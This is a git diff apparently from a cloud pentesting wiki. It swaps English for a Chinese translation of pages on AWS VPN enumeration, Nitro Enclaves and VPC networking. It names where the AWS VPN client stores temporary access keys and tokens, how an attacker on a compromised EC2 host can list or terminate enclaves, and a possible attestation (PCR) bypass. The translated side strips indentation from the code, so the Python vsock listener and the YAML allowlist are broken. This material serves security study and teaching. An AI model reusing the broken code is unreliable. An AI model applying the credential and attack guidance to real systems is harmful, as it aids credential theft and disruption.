**硬件和固件的安全性**,进一步巩固其强大的架构。 -Get more information and how to enumerate it from: +获取更多信息以及如何枚举它: {{#ref}} aws-nitro-enum.md @@ -248,35 +238,34 @@ aws-nitro-enum.md ## VPN -A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet. +VPN 允许将您的 **本地网络(站点到站点 VPN)** 或 **工作人员的笔记本电脑(客户端 VPN)** 连接到 **AWS VPC**,以便可以在不需要将其暴露于互联网的情况下访问服务。 -#### Basic AWS VPN Components +#### 基本 AWS VPN 组件 -1. **Customer Gateway**: - - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. -2. **Virtual Private Gateway**: - - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - - It is attached to your VPC and serves as the target for your VPN connection. - - VPG is the AWS side endpoint for the VPN connection. - - It handles the secure communication between your VPC and your on-premises network. -3. **Site-to-Site VPN Connection**: - - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - - This type of connection requires a Customer Gateway and a Virtual Private Gateway. - - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. -4. **Client VPN Endpoint**: - - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - - With Client VPN, each client device uses a VPN client software to establish a secure connection. +1. **客户网关**: +- 客户网关是您在 AWS 中创建的资源,用于表示 VPN 连接的一侧。 +- 它本质上是您在站点到站点 VPN 连接一侧的物理设备或软件应用程序。 +- 您向 AWS 提供路由信息和网络设备的公共 IP 地址(例如路由器或防火墙),以创建客户网关。 +- 它作为设置 VPN 连接的参考点,不会产生额外费用。 +2. **虚拟私有网关**: +- 虚拟私有网关(VPG)是站点到站点 VPN 连接的亚马逊端的 VPN 集中器。 +- 它附加到您的 VPC,并作为您的 VPN 连接的目标。 +- VPG 是 VPN 连接的 AWS 端点。 +- 它处理您的 VPC 和本地网络之间的安全通信。 +3. **站点到站点 VPN 连接**: +- 站点到站点 VPN 连接通过安全的 IPsec VPN 隧道将您的本地网络连接到 VPC。 +- 这种类型的连接需要客户网关和虚拟私有网关。 +- 它用于数据中心或网络与 AWS 环境之间的安全、稳定和一致的通信。 +- 通常用于常规的长期连接,并根据通过连接传输的数据量计费。 +4. **客户端 VPN 端点**: +- 客户端 VPN 端点是您在 AWS 中创建的资源,用于启用和管理客户端 VPN 会话。 +- 它用于允许单个设备(如笔记本电脑、智能手机等)安全地连接到 AWS 资源或您的本地网络。 +- 它与站点到站点 VPN 的不同之处在于,它是为单个客户端设计的,而不是连接整个网络。 +- 使用客户端 VPN,每个客户端设备使用 VPN 客户端软件建立安全连接。 -You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn). +您可以 [**在这里找到有关 AWS VPN 的好处和组件的更多信息**](aws-vpc-and-networking-basic-information.md#vpn)。 ### Enumeration - ```bash # VPN endpoints ## Check used subnetwork, authentication, SGs, connected... @@ -300,31 +289,26 @@ aws ec2 describe-vpn-gateways # Get VPN site-to-site connections aws ec2 describe-vpn-connections ``` +### 本地枚举 -### Local Enumeration +**本地临时凭证** -**Local Temporary Credentials** +当使用 AWS VPN 客户端连接到 VPN 时,用户通常会 **登录到 AWS** 以获取对 VPN 的访问权限。然后,一些 **AWS 凭证被创建并存储** 在本地以建立 VPN 连接。这些凭证 **存储在** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` 中,包含 **AccessKey**、**SecretKey** 和 **Token**。 -When AWS VPN Client is used to connect to a VPN, the user will usually **login in AWS** to get access to the VPN. Then, some **AWS credentials are created and stored** locally to establish the VPN connection. These credentials are **stored in** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` and contains an **AccessKey**, a **SecretKey** and a **Token**. +这些凭证属于用户 `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: 进一步研究这些凭证的权限)。 -The credentials belong to the user `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: research more about the permissions of this credentials). +**opvn 配置文件** -**opvn config files** +如果 **VPN 连接已建立**,您应该在系统中搜索 **`.opvn`** 配置文件。此外,您可以在 **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`** 中找到 **配置**。 -If a **VPN connection was stablished** you should search for **`.opvn`** config files in the system. Moreover, one place where you could find the **configurations** is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`** - -#### **Post Exploitaiton** +#### **后期利用** {{#ref}} ../../aws-post-exploitation/aws-vpn-post-exploitation.md {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md index 0575a17d8..4230061b8 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md @@ -2,21 +2,20 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. +AWS Nitro 是一套 **创新技术**,构成了 AWS EC2 实例的基础平台。由亚马逊推出,以 **增强安全性、性能和可靠性**,Nitro 利用定制的 **硬件组件和轻量级虚拟机监控程序**。它将传统虚拟化功能的大部分抽象到专用硬件和软件中,**最小化攻击面**并提高资源效率。通过卸载虚拟化功能,Nitro 使 EC2 实例能够提供 **接近裸金属的性能**,这对于资源密集型应用特别有利。此外,Nitro 安全芯片专门确保 **硬件和固件的安全性**,进一步巩固其强大的架构。 ### Nitro Enclaves -**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards. +**AWS Nitro Enclaves** 提供一个安全的、**隔离的计算环境**,专门设计用于处理高度敏感的数据。利用 AWS Nitro 系统,这些隔离区确保强大的 **隔离和安全性**,非常适合 **处理机密信息**,如个人身份信息或财务记录。它们具有极简的环境,显著降低数据暴露的风险。此外,Nitro Enclaves 支持加密证明,允许用户验证只有授权代码在运行,这对于维护严格的合规性和数据保护标准至关重要。 > [!CAUTION] -> Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. +> Nitro Enclave 镜像是 **在 EC2 实例内部运行**的,您无法从 AWS 网络控制台查看 EC2 实例是否在运行 Nitro Enclave 镜像。 -## Nitro Enclave CLI installation - -Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). However, these are the most important ones: +## Nitro Enclave CLI 安装 +按照 [**文档中的所有说明**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave)。然而,以下是最重要的说明: ```bash # Install tools sudo amazon-linux-extras install aws-nitro-enclaves-cli -y @@ -32,47 +31,39 @@ nitro-cli --version # Start and enable the Nitro Enclaves allocator service. sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service ``` - ## Nitro Enclave Images -The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like: - +您可以在 Nitro Enclave 中运行的镜像基于 docker 镜像,因此您可以从 docker 镜像创建您的 Nitro Enclave 镜像,例如: ```bash # You need to have the docker image accesible in your running local registry # Or indicate the full docker image URL to access the image nitro-cli build-enclave --docker-uri : --output-file nitro-img.eif ``` +如您所见,Nitro Enclave 镜像使用扩展名 **`eif`**(Enclave Image File)。 -As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File). - -The output will look similar to: - +输出将类似于: ``` Using the locally available Docker image... Enclave Image successfully created. { - "Measurements": { - "HashAlgorithm": "Sha384 { ... }", - "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284", - "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f", - "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3" - } +"Measurements": { +"HashAlgorithm": "Sha384 { ... }", +"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284", +"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f", +"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3" +} } ``` +### 运行映像 -### Run an Image - -As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. It's possible to configure the default resources to give to it in the file - +根据 [**文档**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave),为了运行一个 enclave 映像,您需要为其分配 **至少是 `eif` 文件大小的 4 倍的内存**。可以在文件中配置默认资源以分配给它。 ```shell /etc/nitro_enclaves/allocator.yaml ``` - > [!CAUTION] -> Always remember that you need to **reserve some resources for the parent EC2** instance also! - -After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with: +> 始终记住,您还需要为**父 EC2** 实例**保留一些资源**! +在知道要分配给映像的资源并且甚至修改了配置文件后,可以使用以下命令运行一个 enclave 映像: ```shell # Restart the service so the new default values apply sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service @@ -80,80 +71,72 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n # Indicate the CPUs and memory to give nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16 ``` - ### Enumerate Enclaves -If you compromise and EC2 host it's possible to get a list of running enclave images with: - +如果您攻陷了一个 EC2 主机,可以使用以下命令获取正在运行的 enclave 镜像列表: ```bash nitro-cli describe-enclaves ``` - -It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with: - +不可能在运行的 enclave 镜像内获取 shell,因为这正是 enclave 的主要目的。然而,如果您使用参数 **`--debug-mode`**,则可以通过以下方式获取其 **stdout**: ```shell ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID") nitro-cli console --enclave-id ${ENCLAVE_ID} ``` - ### Terminate Enclaves -If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with: - +如果攻击者通过默认方式攻陷了一个 EC2 实例,他将无法在其中获得 shell,但他将能够通过以下方式**终止它们**: ```shell nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID} ``` - ## Vsocks -The only way to communicate with an **enclave** running image is using **vsocks**. +与运行图像的 **enclave** 进行通信的唯一方式是使用 **vsocks**。 -**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments. +**虚拟套接字 (vsock)** 是 Linux 中的一种套接字系列,专门设计用于促进虚拟机 (**VMs**) 与其 **hypervisors** 之间,或虚拟机 **之间** 的 **通信**。Vsock 使得高效的 **双向通信** 成为可能,而无需依赖主机的网络堆栈。这使得虚拟机即使在没有网络配置的情况下也能进行通信,**使用 32 位上下文 ID (CID) 和端口号** 来识别和管理连接。vsock API 支持流和数据报套接字类型,类似于 TCP 和 UDP,为虚拟环境中的用户级应用程序提供了多功能的工具。 > [!TIP] -> Therefore, an vsock address looks like this: `:` +> 因此,vsock 地址看起来像这样:`:` -To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**: +要找到运行图像的 **CIDs**,您可以执行以下命令并获取 **`EnclaveCID`**:
nitro-cli describe-enclaves
 
 [
-  {
-    "EnclaveName": "secure-channel-example",
-    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
-    "ProcessID": 10131,
+{
+"EnclaveName": "secure-channel-example",
+"EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
+"ProcessID": 10131,
     "EnclaveCID": 16,
     "NumberOfCPUs": 2,
-    "CPUIDs": [
-      1,
-      3
-    ],
-    "MemoryMiB": 1024,
-    "State": "RUNNING",
-    "Flags": "DEBUG_MODE",
-    "Measurements": {
-      "HashAlgorithm": "Sha384 { ... }",
-      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
-      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
-      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
-    }
-  }
+"CPUIDs": [
+1,
+3
+],
+"MemoryMiB": 1024,
+"State": "RUNNING",
+"Flags": "DEBUG_MODE",
+"Measurements": {
+"HashAlgorithm": "Sha384 { ... }",
+"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+}
+}
 ]
 
> [!WARNING] -> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). +> 请注意,从主机上无法知道 CID 是否暴露任何端口!除非使用一些 **vsock 端口扫描器,如** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner)。 -### Vsock Server/Listener +### Vsock 服务器/监听器 -Find here a couple of examples: +这里有几个示例: - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
-Simple Python Listener - +简单的 Python 监听器 ```python #!/usr/bin/env python3 @@ -173,30 +156,26 @@ s.listen() print(f"Connection opened by cid={remote_cid} port={remote_port}") while True: - buf = conn.recv(64) - if not buf: - break +buf = conn.recv(64) +if not buf: +break - print(f"Received bytes: {buf}") +print(f"Received bytes: {buf}") ``` -
- ```bash # Using socat socat VSOCK-LISTEN:,fork EXEC:"echo Hello from server!" ``` +### Vsock 客户端 -### Vsock Client - -Examples: +示例: - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
-Simple Python Client - +简单的 Python 客户端 ```python #!/usr/bin/env python3 @@ -212,64 +191,51 @@ s.connect((CID, PORT)) s.sendall(b"Hello, world!") s.close() ``` -
- ```bash # Using socat echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000 ``` - ### Vsock Proxy -The tool vsock-proxy allows to proxy a vsock proxy with another address, for example: - +工具 vsock-proxy 允许使用另一个地址代理 vsock 代理,例如: ```bash vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml ``` - -This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`: - +这将把 **vsock 中的本地端口 8001** 转发到 `ip-ranges.amazonaws.com:443`,文件 **`your-vsock-proxy.yaml`** 可能包含以下内容,以允许访问 `ip-ranges.amazonaws.com:443`: ```yaml allowlist: - - { address: ip-ranges.amazonaws.com, port: 443 } +- { address: ip-ranges.amazonaws.com, port: 443 } ``` - -It's possible to see the vsock addresses (**`:`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port): - +可以通过以下方式查看 EC2 主机使用的 vsock 地址 (**`:`**)(注意 `3:8001`,3 是 CID,8001 是端口): ```bash sudo ss -l -p -n | grep v_str v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) ``` - ## Nitro Enclave Atestation & KMS -The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF. +Nitro Enclaves SDK 允许一个 enclave 从 Nitro **Hypervisor** 请求一个 **加密签名的证明文档**,该文档包含特定于该 enclave 的 **唯一测量值**。这些测量值,包括 **哈希和平台配置寄存器 (PCRs)**,在证明过程中用于 **证明 enclave 的身份** 和 **与外部服务建立信任**。证明文档通常包含像 PCR0、PCR1 和 PCR2 这样的值,这些值在构建和保存 enclave EIF 时你已经遇到过。 -From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values: +根据 [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves),这些是 PCR 值: -
PCRHash of ...Description
PCR0Enclave image fileA contiguous measure of the contents of the image file, without the section data.
PCR1Linux kernel and bootstrapA contiguous measurement of the kernel and boot ramfs data.
PCR2ApplicationA contiguous, in-order measurement of the user applications, without the boot ramfs.
PCR3IAM role assigned to the parent instanceA contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.
PCR4Instance ID of the parent instanceA contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.
PCR8Enclave image file signing certificateA measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.
+
PCR哈希值...描述
PCR0Enclave 镜像文件镜像文件内容的连续测量,不包括部分数据。
PCR1Linux 内核和引导内核和引导 ramfs 数据的连续测量。
PCR2应用程序用户应用程序的连续、按顺序测量,不包括引导 ramfs。
PCR3分配给父实例的 IAM 角色分配给父实例的 IAM 角色的连续测量。确保只有在父实例具有正确的 IAM 角色时,证明过程才会成功。
PCR4父实例的实例 ID父实例 ID 的连续测量。确保只有在父实例具有特定实例 ID 时,证明过程才会成功。
PCR8Enclave 镜像文件签名证书为 enclave 镜像文件指定的签名证书的测量。确保只有在 enclave 从由特定证书签名的 enclave 镜像文件引导时,证明过程才会成功。
-You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**. +你可以将 **加密证明** 集成到你的应用程序中,并利用与 **AWS KMS** 等服务的预构建集成。AWS KMS 可以 **验证 enclave 证明**,并在其密钥策略中提供基于证明的条件密钥 (`kms:RecipientAttestation:ImageSha384` 和 `kms:RecipientAttestation:PCR`)。这些策略确保 AWS KMS 仅在 enclave 的证明文档有效且满足 **指定条件** 时,才允许使用 KMS 密钥进行操作。 > [!TIP] -> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. +> 请注意,调试模式下的 Enclaves (--debug) 生成的证明文档的 PCR 由零组成 (`000000000000000000000000000000000000000000000000`)。因此,检查这些值的 KMS 策略将失败。 ### PCR Bypass -From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement). +从攻击者的角度来看,注意到某些 PCR 允许修改 enclave 镜像的某些部分或全部,并且仍然有效(例如,PCR4 仅检查父实例的 ID,因此在该 EC2 中运行任何 enclave 镜像将满足此潜在 PCR 要求)。 -Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections. +因此,攻击者如果攻陷 EC2 实例,可能能够运行其他 enclave 镜像以绕过这些保护。 -The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO. +关于如何修改/创建新镜像以绕过每个保护(特别是那些不那么明显的保护)的研究仍然待完成。 ## References - [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) -- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) +- AWS Nitro 教程的所有部分:[https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md index 03277bfd1..08e9fe935 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md @@ -4,37 +4,37 @@ ## AWS Networking in a Nutshell -A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**). +一个 **VPC** 包含一个 **网络 CIDR**,如 10.0.0.0/16(以及它的 **路由表** 和 **网络 ACL**)。 -This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**. +这个 VPC 网络被划分为 **子网络**,因此 **子网络** 与 **VPC**、**路由表** 和 **网络 ACL** 直接 **相关**。 -Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**. +然后,附加到服务(如 EC2 实例)的 **网络接口** 与 **子网络** 通过 **安全组** **连接**。 -Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**. +因此,**安全组** 将限制使用它的网络 **接口** 的暴露端口,**独立于子网络**。而 **网络 ACL** 将 **限制** 暴露端口到 **整个网络**。 -Moreover, in order to **access Internet**, there are some interesting configurations to check: +此外,为了 **访问互联网**,有一些有趣的配置需要检查: -- A **subnetwork** can **auto-assign public IPv4 addresses** -- An **instance** created in the network that **auto-assign IPv4 addresses can get one** -- An **Internet gateway** need to be **attached** to the **VPC** - - You could also use **Egress-only internet gateways** -- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. - - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) +- **子网络** 可以 **自动分配公共 IPv4 地址** +- 在网络中创建的 **实例** 如果 **自动分配 IPv4 地址可以获得一个** +- 需要将 **互联网网关** **附加** 到 **VPC** +- 你还可以使用 **仅出网关** +- 你还可以在 **私有子网** 中拥有一个 **NAT 网关**,这样可以从该私有子网 **连接到外部服务**,但 **无法从外部访问它们**。 +- NAT 网关可以是 **公共的**(访问互联网)或 **私有的**(访问其他 VPC) ![](<../../../../images/image (274).png>) ## VPC -Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs... +亚马逊 **虚拟私有云**(Amazon VPC)使您能够 **在您定义的虚拟网络中启动 AWS 资源**。这个虚拟网络将有多个子网、互联网网关以访问互联网、ACL、安全组、IP... ### Subnets -Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure. +子网有助于加强更高水平的安全性。**相似资源的逻辑分组** 也有助于您在基础设施中保持 **管理的便利性**。 -- Valid CIDR are from a /16 netmask to a /28 netmask. -- A subnet cannot be in different availability zones at the same time. -- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. -- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** +- 有效的 CIDR 范围从 /16 网络掩码到 /28 网络掩码。 +- 一个子网不能同时位于不同的可用区。 +- **AWS 为每个子网保留前三个主机 IP 地址** **用于** **内部 AWS 使用**:第一个主机地址用于 VPC 路由器。第二个地址保留用于 AWS DNS,第三个地址保留用于将来使用。 +- 直接访问互联网的子网称为 **公共子网**,而私有子网则不。
@@ -42,15 +42,15 @@ Subnets helps to enforce a greater level of security. **Logical grouping of simi ### Route Tables -Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the: +路由表确定 VPC 中子网的流量路由。它们确定哪些网络流量被转发到互联网或 VPN 连接。您通常会找到对以下内容的访问: -- Local VPC +- 本地 VPC - NAT -- Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). - - In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. -- VPC endpoints (to access S3 from private networks) +- 互联网网关 / 仅出网关(需要为 VPC 提供互联网访问)。 +- 为了使子网公开,您需要 **创建** 并 **附加** 一个 **互联网网关** 到您的 VPC。 +- VPC 端点(从私有网络访问 S3) -In the following images you can check the differences in a default public network and a private one: +在以下图像中,您可以检查默认公共网络和私有网络之间的差异:
@@ -58,142 +58,138 @@ In the following images you can check the differences in a default public networ ### ACLs -**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges. +**网络访问控制列表(ACLs)**:网络 ACL 是控制子网进出网络流量的防火墙规则。它们可以用于允许或拒绝特定 IP 地址或范围的流量。 -- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections -- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed +- 通常使用安全组来允许/拒绝访问,但这是完全切断已建立反向 shell 的唯一方法。安全组中的修改规则不会停止已经建立的连接。 +- 然而,这适用于整个子网络,禁止某些内容时要小心,因为所需的功能可能会受到干扰。 ### Security Groups -Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\ -Usually this is used to open dangerous ports in instances, such as port 22 for example: +安全组是一个虚拟 **防火墙**,控制 VPC 中实例的入站和出站网络 **流量**。关系 1 SG 对 M 实例(通常是 1 对 1)。\ +通常这用于在实例中打开危险端口,例如端口 22:
